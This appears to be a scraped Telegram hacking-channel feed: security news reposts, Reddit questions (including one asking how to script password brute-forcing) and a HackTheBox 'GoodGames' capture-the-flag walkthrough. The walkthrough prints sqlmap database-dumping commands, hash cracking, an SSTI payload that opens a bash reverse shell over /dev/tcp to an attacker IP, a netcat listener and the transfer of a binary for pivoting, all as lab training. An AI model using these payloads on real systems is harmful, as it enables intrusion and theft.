Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Microsoft finds macOS bug that lets malware bypass security checks Microsoft finds macOS bug that lets malware bypass security checksPost Views: 17 Premium Contenthttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Patreon.png…
and used a years-old technique to escalate privileges and disable macOS’ Gatekeeper to run unsigned payloads.
Trending: New Python malware backdoors VMware ESXi servers for remote access Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?

If you want to express your idea in an article contact us here for a quote: info@blackhatethicalhacking.com
Source: bleepingcomputer.com Source Link https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Images-for-the-News-posts-5-300x150.png Glupteba malware is back in action after Google disruptionDecember 19, 2022
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Images-for-the-News-posts-4-300x150.png Hackers leak personal info allegedly stolen from 5.7M Gemini usersDecember 16, 2022
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Images-for-the-News-posts-2-300x150.png Microsoft patches Windows zero-day used to drop ransomwareDecember 15, 2022
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Images-for-the-News-posts-1-300x150.png Apple security update fixes new iOS zero-day used to hack iPhonesDecember 14, 2022
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png Offensive Security & Ethical Hacking CourseBegin the learning curve of hacking now!
The post Microsoft finds macOS bug that lets malware bypass security checks first appeared on Black Hat Ethical Hacking.
Everything about Cookie and Its Security

What is a cookie and why is it used?Continue reading on InfoSec Write-ups »
Read more...
Everything about Cookie and Its Security

What is a cookie and why is it used?Continue reading on InfoSec Write-ups »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
An Rubber-Ducky alternative

I heard both the Raspberry Pi Pico and Arduino UNO are both good cheaper versions of the rubber ducky, which one would more efficient to run payloads and easier to configure? (I am just starting out in this field so preferably, which one would be easier to get started with?)
Thanks for your time and effort (if i get replies)!

submitted by /u/AllegedlyRay
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How to make a script that inputs random passwords in it?

So, I have this website where there are about, say, 1000 (A particular date) possible password combinations. Not really anything sensitive there (evident from the passwords here). I just wanted to ask how to create a script in python that would go to the website and try these possible combinations until it opens up. Is this possible, or any guide for it?



I wonder if this is the place to ask this question. If this is not the case, please guide me to the appropriate subreddit.

submitted by /u/selfish_eagle
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Wireless USB receiver to act like a Digispark

hello,
is there any possibility to inject a simple code into the old wireless mouse receiver?

when the receiver will be in the PC's USB slot it should run some code written in C++. it is nothing malicious i just would like to recreate something mouse jiggler which you can buy for $10 or something in amazon.

i have a Digispark, though, it is too large and too easy to notice AND i'm afraid to burn my usb port as i dont believe it is safe because it is very cheap.

it feels like it won't be reprogrammable, but i would like to hear your opinions.

submitted by /u/morecaffeinne
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
GoodGames HackTheBox Walkthrough

SummaryGoodGames is a Linux machine and is considered an easy box. but it was tricky indeed. On this box, we will begin with a basic port scan and move laterally. Then we will enumerate domain name and subdomains. Then we will exploit SQL Injection vulnerability using burp and SQLmap. Exploitation of the server-side template injection (SSTI) will give us an initial foothold into the target machine. Then we will be tasked to gain root access where we will exploit it by taking advantage of the special permissions and ownerships both in the server and the Docker. A successful binary abuse will give us a root shell of the target system. Table of ContentInitial Access

* TCP Port Scan
* Initial Enumeration
* Web Page Enumeration
* SQL Injection Exploitation with sqlmap
* Admin Console Enumeration
* Internal Sub Domain Enumeration
* Server-Side Template Injection (SSTI) Exploitation
* User Flag

Privilege Escalation

* Docker Enumeration
* SUID Permission abuse
* Root Flag

Let’s exploit it step by step. Initial AccessWe are going to start assessment with the normal TCP/IP port scanning. TCP Port ScanLet’s start with the port scan. We are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. In order to perform port scan, we have used –sV and -sC flags which performs a service version scan with NSE scripts against the target machine.

Flags features:

-sV:  Attempts to determine the service version

-sC:  Scans with default NSE scripts
nmap -sV -sC 10.129.33.160
From the nmap scan, we have found there was only one port open, which is port 80. As usual HTTP service is running on its default port and the HTTP service is used for the webhosting. Let’s take some notes about our findings.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO-B64vfMAIyV9rs-C-O6tVoSdRlCVPRvdAIVTaS3a0uXXqwl6DFXXaycI-fy5dhcZuUcEFUcbjL9ZwYzXKdl_vJrtJzvJU-i7x_cTaDA-OMMCop3Ejn-cjbYUikfZSA4xAXN3gMZtB16xowDOhy_ItF6tN7Q6F3jRuaTOKVzIMlg6NTGOip8He4aR6A/s16000/1.png?w=640&ssl=1 Initial EnumerationAs we have only one port is open, we begin with port 80 enumerating by accessing it over the browser and found the web page. From the webpage interface, it looks like a video game online store. If we see our nmap result, we gathered earlier showing the http title as Goodgame community and store that makes sense.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3tk8AQUgjPLBloIyZfIYxFbeKEB0cQi8RcqxgYvo7jcSCCMboSLSZkwzHrbggDf9JxXrqMUkGaKqlKeEf_XsuOWxF1jBXCrEEPIu9qmNEGrR6Bmi4pIT3YHEPqAxGfPMBihZFg122Iv4e1jDbucMY-GKRzIcgTdJ-5PnlD7uySwSS1DRLrk2M5cZzzw/s16000/2.png?w=640&ssl=1 Web Page Enumeration While enumerating webpage we found a login page. From the login in page, we can enumerate further by registering ourselves as a new member or if we have valid credentials, we can directly log in to do the same.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi42DeSWIsnJLLk8p1jsI-d9uqrx1O2WeJMJJzgFlm9pmZT7gsAKS6zUG_gDTmKs-tnvYrRZL98eJ9lJM9liGznUapp7hkZ5Tyy5EshqwIz1CxLzN2PUB1EPNgwji5H3YeGPowVf9-uGJ4xP_6H2YSZx57FDLdllnq7eOq85A3DHjG7gqrWRX09S1_cQ/s16000/3.png?w=640&ssl=1

Before registering a new user account let’s capture the login request on the burp. Here we are using a random email and password. You can use any random credentials to capture request for testing purpose.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijaKZJG5g9iefocLWc8Hkc2Vz3fl4U6aDsLJOK-YYOUjM1kCrBkKk5WlG-9Vgysyjib8iNP5JpX-_yafrUcYz_V7b8dXjaTHO4wJ8Sp2xzlWIqx10a059pVrDKny5XZQmLPZzDrXKS_qZo1Zia_ZO7bSHmUL2A0bZwtGLOsBLsPj73Fy7dZOqSBjTeJA/s16000/4.png?w=640&ssl=1

We are capturing login request on burp to check if there is any SQL injection vulnerability present in the target [...]
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles GoodGames HackTheBox Walkthrough SummaryGoodGames is a Linux machine and is considered an easy box. but it was tricky indeed. On this box, we will begin with a basic port scan and move laterally. Then we will enumerate domain name and subdomains.…
system. We captured the request and saved as sqlfile.  The reason we are checking SQL injection vulnerability as there is a login page and it is worth checking SQL injection in login pages and on any user input field. Most of the time, SQL injection vulnerabilities found in user input fields in the web application.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgch5WualdeC0S0xYwGLfrtlsdXbADB94nXVREwDRtL0eDi1Tzi6qx-X9m8sUqtsWEGm3mvXCW-6WLIiDRn7lwxi8cjL4n8tWENavhEp71HVaAAiGgmsV6tGzit9HtlsxErWv3c2TsRzruBKnRy9D19BMnOTHOAy_fvl7UEjBkrIJoVfMdAmjS6M77Wyw/s16000/5.png?w=640&ssl=1 SQL Injection Exploitation with sqlmapNext, we are going to check the database name by loading the login request that we captured on burp. In the below picture, we have loaded sqlfile on sqlmap which will be going to find out the database name if the web application login parameter is vulnerable to SQL injection. Full functions of the flags are given below.
sqlmap -r sqlfile –dbs --batch
–dbs: Enumerate DBMS databases

–-batch: Never ask for user input, use the default behaviour

-r: Request

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqgpjO4xXhQgO2VX_4JtZrA3pMr-zxokPH17d4gmgfV4XMW0EdinVGA7jeRf9Ah6FZEsNg3kYh3eFbCzxjN8R9E5-vZIxrNPdVh3dafIqjOGmKskDCTcIwpRcTKEOZjdeTMCe2zEgJDc-1XysUNqAhKw4y0Dlm6kWnYzdUSjvmDPWXOYXwuacRJz0BYQ/s16000/6.png?w=640&ssl=1

Once we get the database name then we will dump all the contents that the database is containing by issuing a request file, and database name.
sqlmap -r sqlfile -D main –dbs --batch
–dump-all: Dump all-D: Database name

–-batch: Never ask for user input, use the default behaviour

-r: Request

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitfYAhZTLwUpzNVprfZca0NXVzVy7VEdTkDOBoC0k9_WdsqUeC4Fs5f2leGqWyWPDtgpFFPa83vWRMui48PjXR5fGfR3Z78J_f5oiCnDfWQ5oEugv1nYmP5dnivOLtric6Y5eN_CoYyHTVMD6GYtpxrGJ2-W4oXV8iNEnK8Q-W3lu_egNGwzkvBzWJ5A/s16000/7.png?w=640&ssl=1

After dumping all the contents from the main database, we found the username, email and password hash. Here we are going to keep a note of dumped information.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkIHln11-frTWCTX5llD_PZ4_XZbRQMwP1SDr4kzvocpJxhtVQq-tdZYLDt157CXB67-pOcHbuLaASu9sftLPNleAasU_XV88cD1JE3ZLKsYz8pPo2wYO4NT4zkep3onx4qIS0TfpoqMTWHk3bC05__yUjQ6gt5F89DAaDX59ePP2foBVTZVNr-8SuQw/s16000/8.png?w=640&ssl=1

It looks like an md5 hash but what can we do with this hash? Until we have a plain text password, we cannot proceed further. So, we simply copy the full hash and pasted google gave us a plain texted password of md5hash. What else we could do if we did not get a plain texted password from google? Then we can use crackstation website to crack hash or hashcat and john tools to crack the hash offline.

Password: superadministrator

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHYpZ74OcMU96yYl2MqGFrZ5hJ0ebCe4j-bJ8LcqiGAvsj_OOnNuCUd61-Lnj5ElKYvARKL6BG9FRYyELOGdIEl2xN5S-fT-wf-5cDiYFKxeuydBNjFEwY5bykO6n1bVas5fxBFIaOLmyyvp3I9nBU6L2kYydPQaYzwL5DHYlU0WINn9Q_774_MNmdaQ/s16000/9.png?w=640&ssl=1 Admin Console EnumerationAs we have admin user password in the plain texted form, we can try log in as admin user in the web console for further assessment.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq4tNs5Je4-8x6J1BF9faXmEcIStyPbXujAVizYfidsFo_2lUWQKMWcdRjYJQYlx68Cb84Uzb9qLSQHTEv6b6JWldII-2ud1HFQ-cNVlPpS5lGjx69eGAgDlUZk1ZytHGAH2a9lJWiju7Ff0cboLIjtZubaPl3J_bTXBsvv1MWmK3DhBLp5_blFxZjHg/s16000/10.png?w=640&ssl=1

After logging in, we tried enumerating the administrator account but unfortunately, we did not get anything interesting there. There was same information that we already have but nothing much more.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfWPtUOspJ96OdEenLOa2jsmiO55BLsNLFWgTR0jmGYk-Y66XNhdgNPqAhrn-JrAdqcmhIsE3V56fDgCNuUjKN-k5MYev5nVGEgTAX0WCX_O95ZVxwfRmzK1BUqAfBxQxkdWMYbXjh3wCpZVsknNhxoxXlCQY9qbIm[...]
Hacking Articles Tips Tricks Videos Tutorials
system. We captured the request and saved as sqlfile.  The reason we are checking SQL injection vulnerability as there is a login page and it is worth checking SQL injection in login pages and on any user input field. Most of the time, SQL injection vulnerabilities…
rP8pkXtdeLCTE40E6CCGbcwbVQ/s16000/11.png?w=640&ssl=1

Then we decided to check source code of the admin profile page and found a new subdomain there. It is worth checking source code as many times we may get valuable information from there such as subdomain or any secrets from the comment etc.

Subdomain url: http://internal-administration.goodgames.htb

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUOxQNbLAFS6fRlnGUS3QmUtQqKi-PYDVr6GviMr7lzKxAZ6aUq3c8-psJQ4jUSncpRMk9TKnJ4gReLkV6_FAOw0bq-2BPRJG4qLTGMPQ_nAKhSyNJvtnI2ojqUO0HgGvMEpqF-bDhiRRlwoYsYfkBSu3i8pkhNX-tbmT0HDMCj2iRuMGbs0ayn_jLTg/s16000/12.png?w=640&ssl=1

Let’s add it to the/etc/hosts file in the attacking machine.

Why do we need to add domain in the local hosts file?

The /etc/hosts file contains a mapping of IP addresses to URLs. Your browser uses entries in the /etc/hosts file to override the IP-address-to-URL mapping returned by a DNS server. This is useful for testing DNS (domain name system) changes and the SSL configuration before making a website live.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBz9kda8V3aVMgQICfeANqHaR-ZHYukgs0klUAHi-r6ExSh3sto9eIWSpcNoCB9HkTmkpZPgG3ns-zxFzwGHRT8oWy25shvpFU4WIVECH0GqtPL-eJ-DP2XXi7e_HMNW758kShkYqeRTL0BUnZPpQACjIU2qwBGEkO-HIosjZFYDjgPOucZXkFdVgSoA/s16000/13.png?w=640&ssl=1 Internal Sub Domain EnumerationAfter adding an internal sub-domain to the hosts file, we accessed it over a browser where we have seen a new web page with a login page. We used the same credentials that we used earlier to Flask Volt sign-in system.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg89A90Ja3vvqA--eOpv4Tjk-W4j7PzPCOjyYeb4g5mvzt01CwjBmn4PquFGB0WNIgcIH3P2UFGutMf9ETWahJw7Goay6-aXJxC-pWnq_H03fp4v1BvGcvJsKEwgy8IE_ugVamn_JtNWW0oRXfCr-sYyVdDsBMz1lXSYoFqaeYUdN_ElTpiJeciVQ1CJg/s16000/14.png?w=640&ssl=1 Server-Side Template Injection (SSTI) ExploitationFrom the information, we gathered during the nmap scan the server-side code was a python, so it is worth checking the Server-side template injection (SSTI). Here we are using a payload to detect SSTI, and the detection process is like the XXS. We have found that the user input field is vulnerable to SSTI as it is reflecting the sum of the payload provided.

What is SSTI vulnerability?

A server-side template injection (SSTI) vulnerability occurs when user data is embedded directly in a template and then interpreted by the template engine. This allows attackers to inject arbitrary directives to manipulate the template engine.

Detection payload: {{5*5}}

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGcFuGfKzT90t1fR4Iz97bsynUBMWQ6vonVe083enKIYMou8YUh8btYfdQdQel_jki6OpnvZ35P7qiMK02X8-kzE6ai7bRNjn-FdWNMufFTvU5dsULD--2wdMM6ulqk2wCgtjuYLTxPkpij6lfw2vX_EytcP8NvZZtkY7LVsP95ju1YMSMe-j11M2jLw/s16000/15.png?w=640&ssl=1

Now it is confirmed that target system is vulnerable to the SSTI, now we are in the position to move forward to inject a reverse shell payload. For the reverse shell we are using a popular git repository “Payload All The Things” where you will find all the payloads you will need during your penetration testing engagement. Please note, we will need to modify payload to receive the reverse shell. For example, we need to issue our attacking machine IP address (10.10.14.93) and port number (1234) where we wish to listen. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#exploit-the-ssti-by-calling-subprocesspopen

Original payload:
{{ namespace.__init__.__globals__.os.popen('id').read() }}
Modified payload:
{{ namespace.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.93/1234 0>&1"').read() }}
When our payload is crafted then we will inject it into the user input field which is “Full Name”  in the target web application then we will start a netcat listener in our attacking machine with the below command.
nc -lvp 1234
https://i0.wp[...]
Hacking Articles Tips Tricks Videos Tutorials
rP8pkXtdeLCTE40E6CCGbcwbVQ/s16000/11.png?w=640&ssl=1 Then we decided to check source code of the admin profile page and found a new subdomain there. It is worth checking source code as many times we may get valuable information from there such as subdomain…
.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiftbkU8yNmKx7mmFJRTzuWCDOptDItKUM_rQ9oA9tD_3cTFYSrnRIu6fNUzmvL3wC2wzeDdIw2Gl13LjDTeQC8wM6hVGtKjmd2qz_Zz6CceLEUnqSsJrcngJpXbe5i4TXw14MsDKNMsHUK_Io-L-9Ri7H3OCLbFDtSxaD5Fgra-p-2aOqwzMTBkR7TvA/s16000/18.png?w=640&ssl=1 User flagNext, we will execute it by clicking on Save all tab which will execute our malicious payload in the target system and send a remote connection back to our netcat listener. In the below screenshot, we can see that we have successfully received a reverse connection as user root. But there is a trick, it is not the real root shell which we will discuss later. Once, we get reverse connection then we can grab user flag from the /home/augustus directory.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ5IN93qxzXm1M7tfbG9tyYJ5uf66mt4HpCsJov0y3bP7s5rOSbBEP8-aF1D02jzdxS1bC9hI1JjOX5cUTH-v-4UqeAiE5ByzBBRwh5rbqc46b4SJLG0RJeYHXyoPj2i0uAwEVyf8SNcQ3GY7byFbHa6adODJksHPg1AIIv3Qd5fuY2rp1dZ2oVXEEPg/s16000/19.png?w=640&ssl=1 Privilege Escalation:Docker EnumerationWhile enumerating for the privilege escalation vectors, we found a Docker file present in the root backend directory (/backend) which give an insight that the server is using a docker container in it. Let’s talk docker role in the box or in any server. Please note, that we are in the docker container not in the real server.

We checked the network interface and found it is connected to the internal network adaptor on 172.19.0.2/16 subnet which means we cannot communicate with the internal network directly from our kali system, but the compromised host can communicate with the internal network. In this scenario, we can use port forwarding or pivoting technique to communicate directly from our kali system but before jumping into that we also need to verify which hosts are up in the internal network. To find out the available host in the internal network we are going to use nmap static binary which means a portable nmap binary that we can use from the compromised hosts system against the internal network. We can download the nmap static binary from the below link by providing the following command:
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap
Reference: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNh-FhnjiGQwaqiMqeDeSKQkkKysJcwsBv_J2tm63oPWHTMFqVUr3hUVvHXxkHRt6SLcPopkM_jG2Skpcz0dvuRpblTV2aSPJpMIyFHyIiz914lyklypgFC334SmRL9LAVlbXHc_l3Vh_-_kdmp5o0lG8oC89ZBxpDQoKQp--RSePtZ-kXPaKMkmfzDg/s16000/21.png?w=640&ssl=1

Then we will transfer this binary to the compromised host using the python server by issuing the following command from our kali system:
python3 -m http.server 80
Once the server is on then we can download nmap binary from kali by issuing following command from the compromised host:
wget 10.10.14.93/nmap
Please note we have used the kali IP address as we are transferring binary from there.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg62vKerskEd7eb1D-Oj39UbrdqpZtKxGlzh_T41AcdcI5nTZCgnVHFCbXaw0-lia6kfI4wb3IkPq4zkk2ArLzgUiPfNW6X5GMxP_AfIruRNX1rkBGdtTWqXFT9F23GQ7Ic22D5zd4N0-EaOWvJoNqsG26EUJQrKdCTS500zbXzmHeaTpRgUdKDx4kjQw/s16000/22.png?w=640&ssl=1

Next, we will give full permission to the binary so we can execute it against the internal network in order to find live hosts. For more information about Linux file permissions.

Here we have provided -sn flag which will only show number of available hosts in the subnet and their IP addresses. From the nmap scan result, we found that 172.19.0.1 is up.

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihIG1ZIzhO6dLFrlKIdy4vsq_NDdDskgFZ0Ywp26ZpbRDbf6UDTJmuIwftH9b-peZB1SDPSdMlHW_b95MLnzjTVc4L8PfohR3A9gvID6QjTOQOlYRu3MPWvWRplBqvncrPlb_hSrhzErSKoeay3ZCy9FQmHlL5ykW7IgfoY_JRIl_SQQNphFuUsnMAOg/s16000/23.png?w=640&ssl=1

Once we found the potential target host [...]